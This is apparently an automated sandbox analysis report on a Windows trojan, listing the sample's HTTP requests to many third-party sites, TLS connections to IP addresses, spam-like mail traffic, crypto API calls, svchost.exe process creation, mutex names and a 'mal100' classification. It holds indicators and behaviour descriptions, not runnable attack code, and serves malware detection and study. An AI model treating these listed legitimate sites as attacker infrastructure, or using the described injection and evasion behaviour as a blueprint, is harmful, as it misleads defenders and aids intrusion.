                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=2bff9442b12485418e3a501b44a59acc
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.comCookie: PHPSESSID=c5021e3740c078040485bf529df4f43e
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=2bff9442b12485418e3a501b44a59acc
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.comCookie: PHPSESSID=c5021e3740c078040485bf529df4f43e
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:50101 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.6:50151 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.6:50154 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.6:50157 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.48.207:443 -> 192.168.2.6:50184 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.6:50136 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.6:50199 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:50206 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.6:50232 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.6:50261 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.6:50269 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:50248 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.193.133:443 -> 192.168.2.6:52825 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.193.133:443 -> 192.168.2.6:52824 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:55146 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.6:5088 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.6:5098 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:5112 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:5091 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.7:443 -> 192.168.2.6:5171 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.48.207:443 -> 192.168.2.6:5201 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.6:5185 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.6:5215 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.6:5195 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.6:5223 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.6:5239 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.6:5316 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.6:5377 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.6:5371 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:5374 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.6:5519 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.6:5573 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:5513 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:5319 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.6:6006 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.193.133:443 -> 192.168.2.6:7015 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:6251 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.6:6984 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.6:7432 version: TLS 1.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 45
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01178970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,1_2_01178970
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01178800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_01178800
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01178A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_01178A70
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B8A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,3_2_007B8A70
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B8800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,3_2_007B8800
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B8970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,3_2_007B8970
                  Source: nhVJ8J5qOt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_003740400_2_00374040
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_00371ED00_2_00371ED0
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_003714200_2_00371420
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_003868200_2_00386820
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_003744B00_2_003744B0
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_003785600_2_00378560
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_003889600_2_00388960
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_003875500_2_00387550
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_003729400_2_00372940
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_003885E00_2_003885E0
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_00373A600_2_00373A60
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_00387EF00_2_00387EF0
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_003733700_2_00373370
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_003857500_2_00385750
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_0037CFB60_2_0037CFB6
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_003883A00_2_003883A0
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_00378BFE0_2_00378BFE
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C740401_2_00C74040
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C71ED01_2_00C71ED0
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C744B01_2_00C744B0
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C714201_2_00C71420
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C868201_2_00C86820
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C885E01_2_00C885E0
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C729401_2_00C72940
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C875501_2_00C87550
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C785601_2_00C78560
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C889601_2_00C88960
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C87EF01_2_00C87EF0
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C73A601_2_00C73A60
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C78BFE1_2_00C78BFE
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C883A01_2_00C883A0
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C7CFB61_2_00C7CFB6
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C857501_2_00C85750
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C733701_2_00C73370
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0118128C1_2_0118128C
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_011812CE1_2_011812CE
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007C12CE3_2_007C12CE
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007C128C3_2_007C128C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0408A6BA4_2_0408A6BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04007F794_2_04007F79
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_040077994_2_04007799
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0400B9354_2_0400B935
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_040072C44_2_040072C4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04007B6D4_2_04007B6D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_040083994_2_04008399
                  Source: nhVJ8J5qOt.exeVirustotal: Detection: 28%
                  Source: nhVJ8J5qOt.exeReversingLabs: Detection: 28%
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeFile read: C:\Users\user\Desktop\nhVJ8J5qOt.exeJump to behavior
                  Source: nhVJ8J5qOt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\nhVJ8J5qOt.exe C:\Users\user\Desktop\nhVJ8J5qOt.exe
                  Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
                  Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                  Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@19/4@2269/100
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01171CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,1_2_01171CA0
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\zczoiir65502
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\rjsfitz60229
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\pvoaiwz6588
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCommand line argument: nI80_2_003848C0
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
